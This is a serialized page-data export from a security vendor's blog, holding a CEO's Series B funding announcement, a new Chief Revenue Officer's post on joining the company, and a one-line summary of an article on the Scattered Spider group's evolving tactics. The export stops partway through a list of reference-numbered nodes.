the browser is effectively the new Operating System — the place where users are working, and where the apps they’re using to do their jobs are running. ",{"data":117630,"content":117631,"nodeType":178},{},[117632],{"data":117633,"marks":117634,"value":117635,"nodeType":173},{},[],"We knew that unlocking the power of the browser was the key to solving identity security. I’m so proud to be able to say that we built the world’s first browser-based identity security platform, and being in the browser has been fundamental to what we’ve been able to achieve. ",{"data":117637,"content":117638,"nodeType":178},{},[117639],{"data":117640,"marks":117641,"value":117642,"nodeType":173},{},[],"Immediately, we found the level of accuracy on identity data to be far superior to the alternatives such as API (limited to the apps you know about and impeded by the nuances of APIs) and email (flooded with false positives). By observing identities in real time as users logged into apps, we could build a picture of the entire identity surface — even for unmanaged, previously unknown apps. It was a game changer for us. ",{"data":117644,"content":117645,"nodeType":178},{},[117646],{"data":117647,"marks":117648,"value":117649,"nodeType":173},{},[],"Then, we turned our attention to shutting down attacks. We found unique ways to detect, intercept, and block phishing pages in real time, which has seen us detect previously unseen phishing kits the first time they’re used. If you understand how phishing blocklists typically work, you’ll know how much of a game changer this is — no more waiting for a victim to report (or fall victim) before you can take action. ",{"data":117651,"content":117652,"nodeType":178},{},[117653],{"data":117654,"marks":117655,"value":117656,"nodeType":173},{},[],"We also harnessed our data to automatically verify where employees are using stolen credentials, finding the needle in the haystack where a compromised credential in millions of lines of an infostealer log matches the real, valid credential your employee is using — on one of hundreds of apps in your estate. ",{"data":117658,"content":117662,"nodeType":312},{"target":117659},{"sys":117660},{"id":117661,"type":317,"linkType":318},"Wvc3s8CnI9W7qoZdaCDOv",[],{"data":117664,"content":117665,"nodeType":231},{},[],{"data":117667,"content":117668,"nodeType":169},{},[117669],{"data":117670,"marks":117671,"value":117672,"nodeType":173},{},[],"Staying ahead of attackers",{"data":117674,"content":117675,"nodeType":178},{},[117676],{"data":117677,"marks":117678,"value":117679,"nodeType":173},{},[],"Research is at the heart of everything we do at Push — it’s our heritage. That background gives us an edge when it comes to identifying how attackers think, and more importantly, how to stop them. This new funding allows us to invest heavily in staying ahead of those threats, pairing our R&D with our product roadmap to ensure the features we build are prioritized by the impact they’ll have on securing our customers. ",{"data":117681,"content":117682,"nodeType":178},{},[117683],{"data":117684,"marks":117685,"value":117686,"nodeType":173},{},[],"Right now, the best place to detect and respond to these attacks is in the browser, the place where work happens and identities are accessed — and where attackers are targeting their victims. ",{"data":117688,"content":117689,"nodeType":178},{},[117690],{"data":117691,"marks":117692,"value":117693,"nodeType":173},{},[],"But honestly, if there came a time when this wasn’t the case anymore, we’d follow the attacker to wherever they go next. We’re not here to build shelfware, we’re here to make a real difference for defenders — and make attackers’ lives much harder. ",{"data":117695,"content":117696,"nodeType":231},{},[],{"data":117698,"content":117699,"nodeType":169},{},[117700],{"data":117701,"marks":117702,"value":117703,"nodeType":173},{},[],"Supporting security teams where they are today",{"data":117705,"content":117706,"nodeType":178},{},[117707],{"data":117708,"marks":117709,"value":117710,"nodeType":173},{},[],"When we started Push, identity threats weren’t yet top of mind for many companies. And understandably, there was a healthy degree of skepticism when we set out to leverage the browser. It was uncharted territory for security professionals. ",{"data":117712,"content":117713,"nodeType":178},{},[117714],{"data":117715,"marks":117716,"value":117717,"nodeType":173},{},[],"But I like to think we’ve proven its value — and we’re barely scratching the surface of what’s possible.",{"data":117719,"content":117720,"nodeType":178},{},[117721],{"data":117722,"marks":117723,"value":117724,"nodeType":173},{},[],"With this new funding, we’ll continue to meet that demand with an even more powerful platform, stronger customer support, and deeper integrations that allow security teams to do more, faster.  I can’t wait to show you what we’ve got planned next. ",{"data":117726,"content":117727,"nodeType":231},{},[],{"data":117729,"content":117730,"nodeType":169},{},[117731],{"data":117732,"marks":117733,"value":117734,"nodeType":173},{},[],"Thank you to our investors and customers",{"data":117736,"content":117737,"nodeType":178},{},[117738,117742,117747,117751,117756,117759,117764,117768,117773,117776,117781],{"data":117739,"marks":117740,"value":117741,"nodeType":173},{},[],"We’re incredibly grateful to our Series B lead investor, ",{"data":117743,"marks":117744,"value":117746,"nodeType":173},{},[117745],{"type":370},"Redpoint Ventures",{"data":117748,"marks":117749,"value":117750,"nodeType":173},{},[]," with participation from ",{"data":117752,"marks":117753,"value":117755,"nodeType":173},{},[117754],{"type":370},"Datadog Ventures",{"data":117757,"marks":117758,"value":933,"nodeType":173},{},[],{"data":117760,"marks":117761,"value":117763,"nodeType":173},{},[117762],{"type":370},"B3 Capital ",{"data":117765,"marks":117766,"value":117767,"nodeType":173},{},[],"– all new investors in this round – and to our returning partners at ",{"data":117769,"marks":117770,"value":117772,"nodeType":173},{},[117771],{"type":370},"Decibel",{"data":117774,"marks":117775,"value":933,"nodeType":173},{},[],{"data":117777,"marks":117778,"value":117780,"nodeType":173},{},[117779],{"type":370},"Alphabet’s Google Ventures",{"data":117782,"marks":117783,"value":117784,"nodeType":173},{},[],", along with angel investors who have backed us since the beginning. I truly believe that we have the ultimate combination in partners and advisors who have been at the forefront of scaling transformative technology and cybersecurity companies that will be integral in driving us forward.",{"data":117786,"content":117787,"nodeType":178},{},[117788,117792,117797,117801,117806,117815,117819,117824],{"data":117789,"marks":117790,"value":117791,"nodeType":173},{},[],"A special thank you to ",{"data":117793,"marks":117794,"value":117796,"nodeType":173},{},[117795],{"type":370},"Erica Brescia and Jordan Segall at Redpoint ",{"data":117798,"marks":117799,"value":117800,"nodeType":173},{},[],"— your deep understanding of the security industry, your belief in our team and the problem we’re solving, and your support as we scale mean everything. And to our independent investors ",{"data":117802,"marks":117803,"value":117805,"nodeType":173},{},[117804],{"type":370},"Jon Oberheide, Dug Song, Geoff Belknap, Royal Hansen, Haroon Meer, Ollie Whitehouse, ",{"data":117807,"content":117809,"nodeType":186},{"uri":117808},"https://pushsecurity.com/about/#investors",[117810],{"data":117811,"marks":117812,"value":117814,"nodeType":173},{},[117813],{"type":194},"and others",{"data":117816,"marks":117817,"value":117818,"nodeType":173},{},[]," as well as the teams at ",{"data":117820,"marks":117821,"value":117823,"nodeType":173},{},[117822],{"type":370},"Google Ventures, Decibel, and Datadog",{"data":117825,"marks":117826,"value":117827,"nodeType":173},{},[],": thank you for your trust, your insights, and your commitment to building the future of identity security together. We really couldn’t have done it without you. ",{"data":117829,"content":117830,"nodeType":178},{},[117831],{"data":117832,"marks":117833,"value":117834,"nodeType":173},{},[],"To our customers: thank you for trusting us. To our team: thank you for building something bold. To our investors: thank you for believing in what’s next.",{"data":117836,"content":117837,"nodeType":231},{},[],{"data":117839,"content":117840,"nodeType":169},{},[117841],{"data":117842,"marks":117843,"value":117844,"nodeType":173},{},[],"Looking ahead",{"data":117846,"content":117847,"nodeType":178},{},[117848],{"data":117849,"marks":117850,"value":117851,"nodeType":173},{},[],"We’re focused on speed: faster response to emerging threats, faster product innovation, and faster time to value for the security teams we serve. Our vision has always been to empower people, not just protect them — to guide users toward secure decisions and help security teams operate with clarity and confidence.",{"data":117853,"content":117854,"nodeType":178},{},[117855],{"data":117856,"marks":117857,"value":117858,"nodeType":173},{},[],"This Series B isn’t just fuel for the fire — it’s the start of a whole new chapter. Let’s build something iconic, together. ✌️ ",{"data":117860,"content":117861,"nodeType":178},{},[117862,117867,117877,117881,117891],{"data":117863,"marks":117864,"value":117866,"nodeType":173},{},[117865],{"type":370},"To learn more about our mission and technology, follow us on ",{"data":117868,"content":117870,"nodeType":186},{"uri":117869},"https://www.linkedin.com/company/push-security",[117871],{"data":117872,"marks":117873,"value":117876,"nodeType":173},{},[117874,117875],{"type":194},{"type":370},"LinkedIn",{"data":117878,"marks":117879,"value":933,"nodeType":173},{},[117880],{"type":370},{"data":117882,"content":117884,"nodeType":186},{"uri":117883},"https://twitter.com/PushSecurity",[117885],{"data":117886,"marks":117887,"value":117890,"nodeType":173},{},[117888,117889],{"type":194},{"type":370},"X",{"data":117892,"marks":117893,"value":1477,"nodeType":173},{},[117894],{"type":370},{"data":117896,"content":117897,"nodeType":178},{},[117898,117901,117910],{"data":117899,"marks":117900,"value":37,"nodeType":173},{},[],{"data":117902,"content":117904,"nodeType":186},{"uri":117903},"https://pushsecurity.com/news/push-security-secures-30-million-series-b-funding",[117905],{"data":117906,"marks":117907,"value":117909,"nodeType":173},{},[117908],{"type":370},"Find out more in the press release. ",{"data":117911,"marks":117912,"value":37,"nodeType":173},{},[],{"data":117914,"content":117918,"nodeType":312},{"target":117915},{"sys":117916},{"id":117917,"type":317,"linkType":318},"2gUjr6XIcEDVEqZtxG71aV",[],{"data":117920,"content":117921,"nodeType":178},{},[117922],{"data":117923,"marks":117924,"value":37,"nodeType":173},{},[],"Series B and Beyond: Securing the New Perimeter","I’m thrilled to share that Push Security has raised our Series B funding. This is a huge moment for us and our customers in the fight against identity attacks. ","2025-04-24T00:00:00.000Z","series-b-and-beyond",{"items":117930},[117931],{"sys":117932,"name":117242},{"id":117241},{"items":117934},[117935],{"fullName":117936,"firstName":117937,"jobTitle":117938,"profilePicture":117939},"Adam Bateman","Adam","Co-founder / CEO",{"url":117940},"https://images.ctfassets.net/y1cdw1ablpvd/3Bt9feB72kxdWlS0hvpldi/904bdb8b20d98e53c574f8be2f60996b/Push_Founders_at_Cahoots_October_28_2022_by_Doug_Coombe-20.jpg",{"__typename":1528,"sys":117942,"content":117944,"title":118098,"synopsis":118099,"hashTags":118,"publishedDate":118100,"slug":118101,"tagsCollection":118102,"authorsCollection":118106},{"id":117943},"7yvGkRGcpQcS7wYfH3xA17",{"json":117945},{"data":117946,"content":117947,"nodeType":165},{},[117948,117955,117971,117978,117985,117992,117999,118006,118022,118029,118054,118073,118080],{"data":117949,"content":117950,"nodeType":178},{},[117951],{"data":117952,"marks":117953,"value":117954,"nodeType":173},{},[],"Over the course of my career, I have had the chance to work with some incredible teams at places like Proofpoint and CrowdStrike, both of which were trailblazers in protecting clients from advanced adversary attacks. As I take on this new role at Push Security, I am excited to be joining another team where the foresight into how cyber attacks are evolving is front and center. As attackers shift to infiltrating organizations via user identities, Push is meeting that shift by pioneering a new approach in the identity threat detection and response (ITDR) space, with browser-based identity protection. ",{"data":117956,"content":117957,"nodeType":178},{},[117958,117962,117967],{"data":117959,"marks":117960,"value":117961,"nodeType":173},{},[],"When I first sat down with our CEO Adam Bateman and heard his vision, it was clear to me that Push recognizes that attacks are evolving and the bad actors have set their sights on the new perimeter – identity. Recent attacks making headlines, like the Snowflake incident over the summer, make it clear that cyber attacks are fundamentally changing. It’s a bit of a cliche, but hackers don’t hack in anymore, they",{"data":117963,"marks":117964,"value":117966,"nodeType":173},{},[117965],{"type":1646}," log in",{"data":117968,"marks":117969,"value":117970,"nodeType":173},{},[],". Push is at the forefront of tackling this problem in a way that no one else is addressing. Our approach to browser telemetry is a game-changer in the way we can approach and defend against identity attacks.",{"data":117972,"content":117973,"nodeType":235},{},[117974],{"data":117975,"marks":117976,"value":117977,"nodeType":173},{},[],"Legacy ITDR-aligned solutions feel like bolt-ons, not true problem solvers",{"data":117979,"content":117980,"nodeType":178},{},[117981],{"data":117982,"marks":117983,"value":117984,"nodeType":173},{},[],"Talking with industry friends and advisors before taking this new role confirmed what I believe: that Push has the potential to drive a much-needed evolution in identity security. The modern ITDR space is still relatively early, with many pain points around the blind spots of existing tools and a less-than-satisfactory state of SaaS logging, leaving many security teams in the dark. ",{"data":117986,"content":117987,"nodeType":178},{},[117988],{"data":117989,"marks":117990,"value":117991,"nodeType":173},{},[],"In a world dominated by vendors who have lost focus on providing best-of-breed features designed for specific problems in favor of very broad product portfolios that try to solve everything-everywhere-all-at-once, ITDR is not yet a problem space that is being adequately served by traditional vendors and tools. ",{"data":117993,"content":117994,"nodeType":178},{},[117995],{"data":117996,"marks":117997,"value":117998,"nodeType":173},{},[],"Push Security’s unique solution has the power to move the industry forward in ways that could set new standards for gathering deeper data on these attacks, as well as responding and intercepting them as they happen – just as EDR did a decade ago.",{"data":118000,"content":118001,"nodeType":178},{},[118002],{"data":118003,"marks":118004,"value":118005,"nodeType":173},{},[],"When I joined Proofpoint, I decided to leave my desk behind to carry a bag and get on the road. This gave me a first hand view of what challenges security teams were facing and what was necessary to help solve them. It put me at the cross section of cyber security and compliance, and we built teams and solutions that made it possible for organizations to achieve these milestones. ",{"data":118007,"content":118008,"nodeType":178},{},[118009,118013,118018],{"data":118010,"marks":118011,"value":118012,"nodeType":173},{},[],"I then had an incredible opportunity to do it all over again with CrowdStrike, where I joined a very talented early team and witnessed the explosive growth in EDR. I see a parallel here with Push; nobody knew they needed EDR until new vendors brought it forward. At the time, the critics said ‘",{"data":118014,"marks":118015,"value":118017,"nodeType":173},{},[118016],{"type":1646},"hey, we’re good with anti-virus, why would we need anything else?",{"data":118019,"marks":118020,"value":118021,"nodeType":173},{},[],"’ Of course, you’d be laughed out of the room for holding the same view today. Similarly, I believe we’ll see security products in the browser become equally indispensable. ",{"data":118023,"content":118024,"nodeType":235},{},[118025],{"data":118026,"marks":118027,"value":118028,"nodeType":173},{},[],"Push can be a power tool for security teams",{"data":118030,"content":118031,"nodeType":178},{},[118032,118036,118041,118045,118050],{"data":118033,"marks":118034,"value":118035,"nodeType":173},{},[],"Getting access to browser telemetry in a smart, impactful way has been a tough nut to crack, but Push is bringing it front-and-center. It’s one of those things that makes you think: ",{"data":118037,"marks":118038,"value":118040,"nodeType":173},{},[118039],{"type":1646},"‘why hasn’t this been done before?’",{"data":118042,"marks":118043,"value":118044,"nodeType":173},{},[]," And from my initial conversations with Push customers you see the mirror of this: ",{"data":118046,"marks":118047,"value":118049,"nodeType":173},{},[118048],{"type":1646},"‘could you imagine going back to life without it?’",{"data":118051,"marks":118052,"value":118053,"nodeType":173},{},[]," Seeing and hearing just how customers love Push, and how they have developed a solution that is both secure and highly scalable, gives me confidence in what the future holds for our team. ",{"data":118055,"content":118056,"nodeType":178},{},[118057,118061,118070],{"data":118058,"marks":118059,"value":118060,"nodeType":173},{},[],"And it’s not just about being in the browser, it’s what you do with it that is important. When you look at the backgrounds of the Push Security founders and their offensive security heritage, you can see how and why they are thinking about applying these new capabilities to drive SecOps teams and processes. It’s not just about box-ticking; it’s about genuinely hitting attackers where it hurts and making a meaningful difference to disrupting identity attacks – the #1 threat facing organizations today and responsible for nearly ",{"data":118062,"content":118064,"nodeType":186},{"uri":118063},"https://pushsecurity.com/blog/identity-attacks-in-the-wild/",[118065],{"data":118066,"marks":118067,"value":118069,"nodeType":173},{},[118068],{"type":194},"75 percent of today’s breaches according to some industry estimates",{"data":118071,"marks":118072,"value":1477,"nodeType":173},{},[],{"data":118074,"content":118075,"nodeType":178},{},[118076],{"data":118077,"marks":118078,"value":118079,"nodeType":173},{},[],"My career has always been about working with people, building strong teams, and creating environments where everyone feels they’re contributing to a powerful mission. Having learned from and worked with some of the best, I am proud of the culture I helped create at past companies, and I see the same potential at Push. It’s early days, and that’s exactly where I love to be. ",{"data":118081,"content":118082,"nodeType":178},{},[118083,118087,118095],{"data":118084,"marks":118085,"value":118086,"nodeType":173},{},[],"Push Security really is on the cusp of something transformative, and I’m ready to jump in, bring my experience, and help lead the charge in this next chapter of identity-first security. If you would like to learn more about what we are doing at Push and how we can help your organization, connect with me on ",{"data":118088,"content":118090,"nodeType":186},{"uri":118089},"https://www.linkedin.com/in/karsenault1/",[118091],{"data":118092,"marks":118093,"value":117876,"nodeType":173},{},[118094],{"type":194},{"data":118096,"marks":118097,"value":1477,"nodeType":173},{},[],"Why I’m joining Push Security, from our new Chief Revenue Officer","Push's new Chief Revenue Officer, Kevin Arsenault, shares why he decided to join the Push team.","2024-11-21T00:00:00.000Z","why-im-joining-push-security-the-team-redefining-itdr",{"items":118103},[118104],{"sys":118105,"name":117242},{"id":117241},{"items":118107},[118108],{"fullName":118109,"firstName":118110,"jobTitle":118111,"profilePicture":118112},"Kevin Arsenault","Kevin","Chief Revenue Officer",{"url":118113},"https://images.ctfassets.net/y1cdw1ablpvd/4zJDawMiFCxIXpAZpb5TJn/3f018223f2ad11a75cea33339a8f66a2/image__21_.png",{"items":118115},[118116],{"fullName":118117,"firstName":118118,"jobTitle":118119,"profilePicture":118120},"Bryan Wallace","Bryan","VP Global Partnerships",{"url":118121},"https://images.ctfassets.net/y1cdw1ablpvd/GkYDNlk2Sb4nnlkwhEm0K/d24c0ac5f60270172861317dc55be9cd/headshot__1__1.png","content:blog:introducing-the-push-security-advisor-network-psan.json","blog/introducing-the-push-security-advisor-network-psan.json","blog/introducing-the-push-security-advisor-network-psan",{"_path":118126,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":118127,"summary":118129,"title":46334,"subtitle":118,"metaTitle":118140,"synopsis":105212,"hashTags":118,"publishedDate":105213,"slug":46335,"ogImage":118141,"tagsCollection":118142,"relatedBlogPostsCollection":118148,"authorsCollection":119708,"content":119712,"_id":121132,"_type":5439,"_source":5440,"_file":121133,"_stem":121134,"_extension":5439},"/blog/scattered-spider-ttp-evolution-in-2025",{"id":25066,"publishedAt":118128},"2025-11-13T19:47:38.984Z",{"json":118130},{"data":118131,"content":118132,"nodeType":165},{},[118133],{"data":118134,"content":118135,"nodeType":178},{},[118136],{"data":118137,"marks":118138,"value":118139,"nodeType":173},{},[],"How the notorious Scattered Spider cyber criminal group are evolving their TTPs in 2025 to bypass security controls like MFA and take over accounts on internet applications and services. ","How Scattered Spider TTPs are evolving in 2025",{"url":100704},{"items":118143},[118144,118146],{"sys":118145,"name":505},{"id":504},{"sys":118147,"name":509},{"id":508},{"items":118149},[118150,118455,119155],{"__typename":1528,"sys":118151,"content":118152,"title":46338,"synopsis":88214,"hashTags":118,"publishedDate":88215,"slug":46339,"tagsCollection":118447,"authorsCollection":118451},{"id":25128},{"json":118153},{"nodeType":165,"data":118154,"content":118155},{},[118156,118162,118168,118174,118179,118185,118215,118221,118227,118233,118238,118244,118250,118265,118270,118276,118292,118308,118314,118320,118326,118332,118338,118344,118350,118366,118372,118378,118383,118389,118395,118415,118420,118436,118441],{"nodeType":178,"data":118157,"content":118158},{},[118159],{"nodeType":173,"value":87881,"marks":118160,"data":118161},[],{},{"nodeType":178,"data":118163,"content":118164},{},[118165],{"nodeType":173,"value":87888,"marks":118166,"data":118167},[],{},{"nodeType":178,"data":118169,"content":118170},{},[118171],{"nodeType":173,"value":87895,"marks":118172,"data":118173},[],{},{"nodeType":312,"data":118175,"content":118178},{"target":118176},{"sys":118177},{"id":87902,"type":317,"linkType":318},[],{"nodeType":178,"data":118180,"content":118181},{},[118182],{"nodeType":173,"value":87908,"marks":118183,"data":118184},[],{},{"nodeType":250,"data":118186,"content":118187},{},[118188,118197,118206],{"nodeType":254,"data":118189,"content":118190},{},[118191],{"nodeType":178,"data":118192,"content":118193},{},[118194],{"nodeType":173,"value":87921,"marks":118195,"data":118196},[],{},{"nodeType":254,"data":118198,"content":118199},{},[118200],{"nodeType":178,"data":118201,"content":118202},{},[118203],{"nodeType":173,"value":87931,"marks":118204,"data":118205},[],{},{"nodeType":254,"data":118207,"content":118208},{},[118209],{"nodeType":178,"data":118210,"content":118211},{},[118212],{"nodeType":173,"value":87941,"marks":118213,"data":118214},[],{},{"nodeType":178,"data":118216,"content":118217},{},[118218],{"nodeType":173,"value":87948,"marks":118219,"data":118220},[],{},{"nodeType":169,"data":118222,"content":118223},{},[118224],{"nodeType":173,"value":87955,"marks":118225,"data":118226},[],{},{"nodeType":178,"data":118228,"content":118229},{},[118230],{"nodeType":173,"value":87962,"marks":118231,"data":118232},[],{},{"nodeType":312,"data":118234,"content":118237},{"target":118235},{"sys":118236},{"id":87969,"type":317,"linkType":318},[],{"nodeType":178,"data":118239,"content":118240},{},[118241],{"nodeType":173,"value":87975,"marks":118242,"data":118243},[],{},{"nodeType":169,"data":118245,"content":118246},{},[118247],{"nodeType":173,"value":87982,"marks":118248,"data":118249},[],{},{"nodeType":178,"data":118251,"content":118252},{},[118253,118256,118262],{"nodeType":173,"value":87989,"marks":118254,"data":118255},[],{},{"nodeType":186,"data":118257,"content":118258},{"uri":63182},[118259],{"nodeType":173,"value":87996,"marks":118260,"data":118261},[],{},{"nodeType":173,"value":88000,"marks":118263,"data":118264},[],{},{"nodeType":312,"data":118266,"content":118269},{"target":118267},{"sys":118268},{"id":88007,"type":317,"linkType":318},[],{"nodeType":235,"data":118271,"content":118272},{},[118273],{"nodeType":173,"value":88013,"marks":118274,"data":118275},[],{},{"nodeType":178,"data":118277,"content":118278},{},[118279,118282,118289],{"nodeType":173,"value":88020,"marks":118280,"data":118281},[],{},{"nodeType":186,"data":118283,"content":118284},{"uri":88025},[118285],{"nodeType":173,"value":88028,"marks":118286,"data":118288},[118287],{"type":194},{},{"nodeType":173,"value":88033,"marks":118290,"data":118291},[],{},{"nodeType":178,"data":118293,"content":118294},{},[118295,118298,118305],{"nodeType":173,"value":88040,"marks":118296,"data":118297},[],{},{"nodeType":186,"data":118299,"content":118300},{"uri":989},[118301],{"nodeType":173,"value":992,"marks":118302,"data":118304},[118303],{"type":194},{},{"nodeType":173,"value":88051,"marks":118306,"data":118307},[],{},{"nodeType":178,"data":118309,"content":118310},{},[118311],{"nodeType":173,"value":88058,"marks":118312,"data":118313},[],{},{"nodeType":178,"data":118315,"content":118316},{},[118317],{"nodeType":173,"value":88065,"marks":118318,"data":118319},[],{},{"nodeType":235,"data":118321,"content":118322},{},[118323],{"nodeType":173,"value":88072,"marks":118324,"data":118325},[],{},{"nodeType":178,"data":118327,"content":118328},{},[118329],{"nodeType":173,"value":88079,"marks":118330,"data":118331},[],{},{"nodeType":178,"data":118333,"content":118334},{},[118335],{"nodeType":173,"value":88086,"marks":118336,"data":118337},[],{},{"nodeType":169,"data":118339,"content":118340},{},[118341],{"nodeType":173,"value":88093,"marks":118342,"data":118343},[],{},{"nodeType":178,"data":118345,"content":118346},{},[118347],{"nodeType":173,"value":88100,"marks":118348,"data":118349},[],{},{"nodeType":178,"data":118351,"content":118352},{},[118353,118356,118363],{"nodeType":173,"value":88107,"marks":118354,"data":118355},[],{},{"nodeType":186,"data":118357,"content":118358},{"uri":88112},[118359],{"nodeType":173,"value":88115,"marks":118360,"data":118362},[118361],{"type":194},{},{"nodeType":173,"value":88120,"marks":118364,"data":118365},[],{},{"nodeType":178,"data":118367,"content":118368},{},[118369],{"nodeType":173,"value":88127,"marks":118370,"data":118371},[],{},{"nodeType":178,"data":118373,"content":118374},{},[118375],{"nodeType":173,"value":88134,"marks":118376,"data":118377},[],{},{"nodeType":312,"data":118379,"content":118382},{"target":118380},{"sys":118381},{"id":88141,"type":317,"linkType":318},[],{"nodeType":169,"data":118384,"content":118385},{},[118386],{"nodeType":173,"value":88147,"marks":118387,"data":118388},[],{},{"nodeType":178,"data":118390,"content":118391},{},[118392],{"nodeType":173,"value":88154,"marks":118393,"data":118394},[],{},{"nodeType":178,"data":118396,"content":118397},{},[118398,118401,118405,118408,118412],{"nodeType":173,"value":65787,"marks":118399,"data":118400},[],{},{"nodeType":173,"value":2789,"marks":118402,"data":118404},[118403],{"type":370},{},{"nodeType":173,"value":65795,"marks":118406,"data":118407},[],{},{"nodeType":173,"value":65800,"marks":118409,"data":118411},[118410],{"type":370},{},{"nodeType":173,"value":65804,"marks":118413,"data":118414},[],{},{"nodeType":312,"data":118416,"content":118419},{"target":118417},{"sys":118418},{"id":88181,"type":317,"linkType":318},[],{"nodeType":178,"data":118421,"content":118422},{},[118423,118426,118433],{"nodeType":173,"value":88187,"marks":118424,"data":118425},[],{},{"nodeType":186,"data":118427,"content":118428},{"uri":473},[118429],{"nodeType":173,"value":88194,"marks":118430,"data":118432},[118431],{"type":194},{},{"nodeType":173,"value":88199,"marks":118434,"data":118435},[],{},{"nodeType":312,"data":118437,"content":118440},{"target":118438},{"sys":118439},{"id":88206,"type":317,"linkType":318},[],{"nodeType":178,"data":118442,"content":118443},{},[118444],{"nodeType":173,"value":37,"marks":118445,"data":118446},[],{},{"items":118448},[118449],{"sys":118450,"name":26137},{"id":26136},{"items":118452},[118453],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":118454},{"url":516},{"__typename":1528,"sys":118456,"content":118457,"title":4774,"synopsis":4775,"hashTags":118,"publishedDate":4776,"slug":4777,"tagsCollection":119147,"authorsCollection":119151},{"id":3979},{"json":118458},{"data":118459,"content":118460,"nodeType":165},{},[118461,118466,118482,118488,118494,118499,118502,118509,118515,118531,118541,118547,118553,118559,118643,118646,118653,118728,118733,118736,118743,118750,118756,118762,118769,118785,118791,118798,118804,118810,118817,118823,118829,118845,118850,118853,118860,118867,118873,118962,118968,118975,118981,118987,118992,118999,119005,119011,119017,119024,119030,119036,119042,119048,119053,119056,119063,119069,119099,119105,119120,119136,119141],{"data":118462,"content":118465,"nodeType":312},{"target":118463},{"sys":118464},{"id":3988,"type":317,"linkType":318},[],{"data":118467,"content":118468,"nodeType":178},{},[118469,118472,118479],{"data":118470,"marks":118471,"value":3996,"nodeType":173},{},[],{"data":118473,"content":118474,"nodeType":186},{"uri":3999},[118475],{"data":118476,"marks":118477,"value":4005,"nodeType":173},{},[118478],{"type":194},{"data":118480,"marks":118481,"value":4009,"nodeType":173},{},[],{"data":118483,"content":118484,"nodeType":178},{},[118485],{"data":118486,"marks":118487,"value":4016,"nodeType":173},{},[],{"data":118489,"content":118490,"nodeType":178},{},[118491],{"data":118492,"marks":118493,"value":4023,"nodeType":173},{},[],{"data":118495,"content":118498,"nodeType":312},{"target":118496},{"sys":118497},{"id":4028,"type":317,"linkType":318},[],{"data":118500,"content":118501,"nodeType":231},{},[],{"data":118503,"content":118504,"nodeType":169},{},[118505],{"data":118506,"marks":118507,"value":4040,"nodeType":173},{},[118508],{"type":370},{"data":118510,"content":118511,"nodeType":178},{},[118512],{"data":118513,"marks":118514,"value":4047,"nodeType":173},{},[],{"data":118516,"content":118517,"nodeType":178},{},[118518,118521,118528],{"data":118519,"marks":118520,"value":4054,"nodeType":173},{},[],{"data":118522,"content":118523,"nodeType":186},{"uri":4057},[118524],{"data":118525,"marks":118526,"value":4063,"nodeType":173},{},[118527],{"type":194},{"data":118529,"marks":118530,"value":197,"nodeType":173},{},[],{"data":118532,"content":118533,"nodeType":3769},{},[118534],{"data":118535,"content":118536,"nodeType":178},{},[118537],{"data":118538,"marks":118539,"value":4077,"nodeType":173},{},[118540],{"type":370},{"data":118542,"content":118543,"nodeType":178},{},[118544],{"data":118545,"marks":118546,"value":4084,"nodeType":173},{},[],{"data":118548,"content":118549,"nodeType":178},{},[118550],{"data":118551,"marks":118552,"value":4091,"nodeType":173},{},[],{"data":118554,"content":118555,"nodeType":178},{},[118556],{"data":118557,"marks":118558,"value":4098,"nodeType":173},{},[],{"data":118560,"content":118561,"nodeType":250},{},[118562,118571,118580,118589,118598,118607,118616,118625,118634],{"data":118563,"content":118564,"nodeType":254},{},[118565],{"data":118566,"content":118567,"nodeType":178},{},[118568],{"data":118569,"marks":118570,"value":4111,"nodeType":173},{},[],{"data":118572,"content":118573,"nodeType":254},{},[118574],{"data":118575,"content":118576,"nodeType":178},{},[118577],{"data":118578,"marks":118579,"value":4121,"nodeType":173},{},[],{"data":118581,"content":118582,"nodeType":254},{},[118583],{"data":118584,"content":118585,"nodeType":178},{},[118586],{"data":118587,"marks":118588,"value":4131,"nodeType":173},{},[],{"data":118590,"content":118591,"nodeType":254},{},[118592],{"data":118593,"content":118594,"nodeType":178},{},[118595],{"data":118596,"marks":118597,"value":4141,"nodeType":173},{},[],{"data":118599,"content":118600,"nodeType":254},{},[118601],{"data":118602,"content":118603,"nodeType":178},{},[118604],{"data":118605,"marks":118606,"value":4151,"nodeType":173},{},[],{"data":118608,"content":118609,"nodeType":254},{},[118610],{"data":118611,"content":118612,"nodeType":178},{},[118613],{"data":118614,"marks":118615,"value":4161,"nodeType":173},{},[],{"data":118617,"content":118618,"nodeType":254},{},[118619],{"data":118620,"content":118621,"nodeType":178},{},[118622],{"data":118623,"marks":118624,"value":4171,"nodeType":173},{},[],{"data":118626,"content":118627,"nodeType":254},{},[118628],{"data":118629,"content":118630,"nodeType":178},{},[118631],{"data":118632,"marks":118633,"value":4181,"nodeType":173},{},[],{"data":118635,"content":118636,"nodeType":254},{},[118637],{"data":118638,"content":118639,"nodeType":178},{},[118640],{"data":118641,"marks":118642,"value":4191,"nodeType":173},{},[],{"data":118644,"content":118645,"nodeType":231},{},[],{"data":118647,"content":118648,"nodeType":169},{},[118649],{"data":118650,"marks":118651,"value":4202,"nodeType":173},{},[118652],{"type":370},{"data":118654,"content":118655,"nodeType":250},{},[118656,118665,118674,118683,118692,118701,118710,118719],{"data":118657,"content":118658,"nodeType":254},{},[118659],{"data":118660,"content":118661,"nodeType":178},{},[118662],{"data":118663,"marks":118664,"value":4215,"nodeType":173},{},[],{"data":118666,"content":118667,"nodeType":254},{},[118668],{"data":118669,"content":118670,"nodeType":178},{},[118671],{"data":118672,"marks":118673,"value":4225,"nodeType":173},{},[],{"data":118675,"content":118676,"nodeType":254},{},[118677],{"data":118678,"content":118679,"nodeType":178},{},[118680],{"data":118681,"marks":118682,"value":4235,"nodeType":173},{},[],{"data":118684,"content":118685,"nodeType":254},{},[118686],{"data":118687,"content":118688,"nodeType":178},{},[118689],{"data":118690,"marks":118691,"value":4245,"nodeType":173},{},[],{"data":118693,"content":118694,"nodeType":254},{},[118695],{"data":118696,"content":118697,"nodeType":178},{},[118698],{"data":118699,"marks":118700,"value":4255,"nodeType":173},{},[],{"data":118702,"content":118703,"nodeType":254},{},[118704],{"data":118705,"content":118706,"nodeType":178},{},[118707],{"data":118708,"marks":118709,"value":4265,"nodeType":173},{},[],{"data":118711,"content":118712,"nodeType":254},{},[118713],{"data":118714,"content":118715,"nodeType":178},{},[118716],{"data":118717,"marks":118718,"value":4275,"nodeType":173},{},[],{"data":118720,"content":118721,"nodeType":254},{},[118722],{"data":118723,"content":118724,"nodeType":178},{},[118725],{"data":118726,"marks":118727,"value":4285,"nod